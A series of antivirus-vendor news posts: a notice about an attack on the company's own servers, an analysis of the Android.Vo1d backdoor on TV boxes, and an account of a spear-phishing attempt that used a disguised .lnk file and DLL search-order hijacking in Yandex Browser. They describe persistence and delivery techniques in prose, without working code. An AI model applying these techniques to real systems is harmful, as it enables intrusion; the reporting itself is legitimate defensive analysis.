September 16, 6:30 GMT

In accordance with our security policy, we temporarily disconnected certain nodes in Doctor Web's infrastructure from the Internet to perform additional checks. This resulted in a short-term interruption in the availability of Dr.Web virus database updates.

September 17, 13:30 GMT

Dr.Web virus database updates resumed in full. None of Doctor Web’s customers have been affected by the incident.

We continue to adhere to the highest information security standards and promptly take whatever measures are necessary to ensure the stable operation of all our systems and services.

Doctor Web's resources attacked

Tue, 17 Sep 2024 14:47:28 GMT

September 17, 2024  

On Saturday, September 14, Doctor Web specialists recorded a targeted attack on the company's resources. The attempt to harm our infrastructure was prevented in a timely manner, and no user whose system was protected by Dr.Web was affected.

For the time being, in accordance with the company’s security protocol, all resources are disconnected from the network so that they can be checked. Because of this, the release of Dr.Web virus databases is temporarily suspended. Our Dr.Web FixIt! service, its special pre-release version for Linux, is being used to diagnose and eliminate the consequences of the attack. This allows us to scan our resources more quickly. The release of virus databases will resume shortly.

Void captures over a million Android TV boxes

Thu, 12 Sep 2024 02:00:00 GMT

September 12, 2024

Doctor Web experts have uncovered yet another case of an Android-based TV box infection. The malware, dubbed Android.Vo1d, has infected nearly 1.3 million devices belonging to users in 197 countries. It is a backdoor that puts its components in the system storage area and, when commanded by attackers, is capable of secretly downloading and installing third-party software.

In August 2024, Doctor Web was contacted by several users whose Dr.Web antivirus had detected changes in their device’s system file area. The problem occurred with these models:

TV box model	Declared firmware version
R4	Android 7.1.2; R4 Build/NHG47K
TV BOX	Android 12.1; TV BOX Build/NHG47K
KJ-SMART4KVIP	Android 10.1; KJ-SMART4KVIP Build/NHG47K

All these cases involved similar signs of infection, so we will describe them using one of the first requests we received as an example. The following objects were changed on the affected TV box:

install-recovery.sh
daemonsu

In addition, 4 new files emerged in its file system:

/system/xbin/vo1d
/system/xbin/wd
/system/bin/debuggerd
/system/bin/debuggerd_real

The vo1d and wd files are the components of the Android.Vo1d trojan that we discovered.

The trojan’s authors probably tried to disguise one if its components as the system program /system/bin/vold, having called it by the similar-looking name “vo1d” (substituting the lowercase letter “l” with the number “1”). The malicious program’s name comes from the name of this file. Moreover, this spelling is consonant with the English word “void”.

The install-recovery.sh file is a script that is present on most Android devices. It runs when the operating system is launched and contains data for autorunning the elements specified in it. If any malware has root access and the ability to write to the /system system directory, it can anchor itself in the infected device by adding itself to this script (or by creating it from scratch if it is not present in the system). Android.Vo1d has registered the autostart for the wd component in this file.

The modified install-recovery.sh file

The daemonsu file is present on many Android devices with root access. It is launched by the operating system when it starts and is responsible for providing root privileges to the user. Android.Vo1d registered itself in this file, too, having also set up autostart for the wd module.

The debuggerd file is a daemon that is typically used to create reports on occurred errors. But when the TV box was infected, this file was replaced by the script that launches the wd component.

The debuggerd_real file in the case we are reviewing is a copy of the script that was used to substitute the real debuggerd file. Doctor Web experts believe that the trojan’s authors intended the original debuggerd to be moved into debuggerd_real to maintain its functionality. However, because the infection probably occurred twice, the trojan moved the already substituted file (i.e., the script). As a result, the device had two scripts from the trojan and not a single real debuggerd program file.

At the same time, other users who contacted us had a slightly different list of files on their infected devices:

daemonsu (the vo1d file analogue — Android.Vo1d.1);
wd (Android.Vo1d.3);
debuggerd (the same script as described above);
debuggerd_real (the original file of the debuggerd tool);
install-recovery.sh (a script that loads objects specified in it).

An analysis of all the aforementioned files showed that in order to anchor Android.Vo1d in the system, its authors used at least three different methods: modification of the install-recovery.sh and daemonsu files and substitution of the debuggerd program. They probably expected that at least one of the target files would be present in the infected system, since manipulating even one of them would ensure the trojan’s successful auto launch during subsequent device reboots.

Android.Vo1d’s main functionality is concealed in its vo1d (Android.Vo1d.1) and wd (Android.Vo1d.3) components, which operate in tandem. The Android.Vo1d.1 module is responsible for Android.Vo1d.3’s launch and controls its activity, restarting its process if necessary. In addition, it can download and run executables when commanded to do so by the C&C server. In turn, the Android.Vo1d.3 module installs and launches the Android.Vo1d.5 daemon that is encrypted and stored in its body. This module can also download and run executables. Moreover, it monitors specified directories and installs the APK files that it finds in them.

A study conducted by Doctor Web malware analysts showed that the Android.Vo1d backdoor has infected around 1.3 million devices, while its geographical distribution included almost 200 countries. The largest number of infections were detected in Brazil, Morocco, Pakistan, Saudi Arabia, Russia, Argentina, Ecuador, Tunisia, Malaysia, Algeria, and Indonesia.

Countries with the highest number of infected devices detected

One possible reason why the attackers distributing Android.Vo1d specifically chose TV boxes is that such devices often run on outdated Android versions, which have unpatched vulnerabilities and are no longer supported with updates. For example, the users who contacted us have models that are based on Android 7.1, despite the fact that for some of them the configuration indicates much newer versions, such as Android 10 and Android 12. Unfortunately, it is not uncommon for budget device manufacturers to utilize older OS versions and pass them off as more up-to-date ones to make them more attractive.

In addition, users themselves may mistakenly perceive TV boxes to be better protected devices, compared to smartphones. As a result, they may install anti-virus software on these less often and risk encountering malware when downloading third-party apps or installing unofficial firmware.

At the moment, the source of the TV boxes’ backdoor infection remains unknown. One possible infection vector could be an attack by an intermediate malware that exploits operating system vulnerabilities to gain root privileges. Another possible vector could be the use of unofficial firmware versions with built-in root access.

Dr.Web anti-virus for Android successfully detects all known Android.Vo1d trojan variants, and, if root access is available, cures the infected devices.

Indicators of compromise

More details on Android.Vo1d.1

More details on Android.Vo1d.3

More details on Android.Vo1d.5

Gaining persistence in a compromised system using Yandex Browser. Failed spear phishing attack on Russian rail freight operator.

Wed, 04 Sep 2024 04:00:00 GMT

Download PDF

September 4, 2024

Social engineering is a highly effective fraud technique that is difficult to withstand. A skilled attacker knows how to find the right approach to intimidate or persuade a victim to perform an action. But what if an attack requires little communication effort, and a computer stops being a digital assistant and becomes an unwitting accomplice?

Spear phishing is a popular method of delivering malware to computers in large organizations. It differs from regular phishing in that the attackers gather information in advance and personalize the message they send to encourage the victim to perform an action that will result in a security breach. The primary targets are either high-level employees with access to valuable information, or employees in departments that interact with multiple recipients. This is especially true for HR staff who receive many emails from strangers that have attachments in a variety of formats. This is the attack vector of choice for the threat actors in the case we are about to discuss.

In March 2024, a large Russian company in the rail freight industry contacted Doctor Web. A suspicious email with an attachment caught the attention of their information security department. After trying to determine the threat posed by the attached file, they contacted our specialists. After reviewing the request, our analysts concluded that the company had almost been the victim of spear phishing. The goal of the perpetrators was to gather system information and launch modular malware on a compromised PC.

To carry out the attack, the criminals sent a phishing email disguised as a jobseeker's résumé to the company's email address. Attached to the email was an archive purporting to contain a PDF file containing a job application. That file had the so-called “double” extension of .pdf.lnk. Hiding malicious objects by using double extensions is a common tactic employed by attackers to fool their victims. By default, Windows hides file extensions as a convenience to the user. And when a file has a “double” extension, the system only hides the last extension. In this case, the victim could see the first extension—.pdf, while the .lnk extension was hidden. Moreover, even if the display of full filenames is enabled, the .lnk extension is always hidden by the operating system.

The idea of compromising systems using lnk files is not new. The most notable attack occurred in 2010, when uranium enrichment facilities in the Iranian city of Natanz suffered an unprecedented cyberattack. A worm called Stuxnet attacked the PLCs that controlled gas centrifuges, spinning them to extreme speeds and then stopping abruptly, destroying their casings. In addition to damaging the equipment, the worm infected more than 200,000 computers in many countries around the world. The primary attack vector was an lnk file that ended up on a USB drive on a corporate control computer. To run the malicious program, the user simply had to navigate to the folder containing the weaponized lnk file. The attack exploited four zero-day vulnerabilities, most notably the CPLINK exploit, which allowed the Stuxnet worm to launch without user involvement.

Metadata stored in an lnk file

The real .lnk extension is an extension for shortcuts in Windows. In the Target field, you can specify the path to any operating system object, such as an executable file, and run it with the required parameters. This attack covertly launched the PowerShell command prompt, which downloaded from the attackers' website two malicious scripts, each of which launched its own payload.

Attack chain

The first was a decoy PDF and executable file called YandexUpdater.exe, which posed as a component for updating Yandex Browser (the name of the real component is service_update.exe). This executable is a malware dropper called Trojan.Packed2.46324, which, after conducting a series of checks to determine whether it is running in an emulated environment and whether debugging software is present, unpacks Trojan.Siggen28.53599 on the compromised system. The latter has remote control capabilities, collects system information and downloads various malicious modules. In addition to these functions, the trojan also has anti-debugging capabilities. If antivirus, virtual machine and debugger processes are detected, the trojan overwrites its file with zeros and deletes it and the folder in which it was stored.

Decoy PDF file

The second payload consisted of a decoy PDF file and Trojan.Siggen27.11306. This trojan is a dynamic library (DLL) with an encrypted payload. A unique feature of this trojan is that it exploits the vulnerability of Yandex Browser to DLL Search Order Hijacking. In Windows, DLL files are libraries that applications use to store functions, variables and interface elements. When launched, the applications search for libraries in several data stores in a specific order, so attackers can try to “jump the queue” and place a malicious library in the folder where DLL searches are prioritized.

Simplified DLL search prioritization scheme

This trojan is stored in the hidden %LOCALAPPDATA%\Yandex\YandexBrowser\Application folder under the name Wldp.dll. This is the directory where Yandex Browser is installed and where the browser looks for the libraries it needs at startup. In turn, the legitimate Wldp.dll library, whose function is to ensure the security of application startup, is an OS system library and is located in the %WINDIR%\System32 folder. Since the malicious library is located in the Yandex Browser installation folder, it is loaded first. At the same time, it gets all the permissions of the main application: it can execute commands and create processes on behalf of the browser, as well as inherit firewall rules for Internet access.

After the browser is launched, the malicious Wldp.dll library decrypts the payload embedded in it. Note that the decryption is done twice. The first time it is done using a key generated from the hash of the path where the malicious DLL is located, and then using a global key embedded in the body of the trojan. The decryption results in shell code, the execution of which allows attackers to run an application, written in the .NET language, on the compromised system. This executable, in turn, downloads malware from the network. Unfortunately, at the time of our investigation, the server that the downloader was communicating with was down, and we were unable to determine what specific trojan was being downloaded in this case.

Thus, we see a multi-vector, multi-stage infection scheme with two different trojans that are delivered to a compromised system when a file from a phishing email is opened. Despite the complexity of the implementation, preventing and protecting against such attacks is quite simple:

Raise employee awareness of information security issues (carefully check links and filenames, and do not open suspicious objects).
Use software products that perform email filtering, such as Dr.Web Mail Security Suite, to prevent the delivery of malicious emails and attachments.
Install antivirus software, such as Dr.Web Desktop Security Suite and Dr.Web Server Security Suite, on all network nodes, which will prevent a dangerous file from getting through when users are working on the Internet or block suspicious activities on user computers if a file was delivered on a USB drive.
Regularly apply software updates that fix program bugs.

Having discovered this vulnerability in Yandex Browser, we submitted our findings to Yandex. The developers promptly released an updated version of Yandex Browser (24.7.1.380) where this vulnerability (CVE-2024-6473) is fixed.

To ensure the safety of Yandex Browser users, we have coordinated the release date of this article with browser developers to allow users to upgrade to a patched version of Yandex Browser before the details of this attack are made public.

Indicators of compromise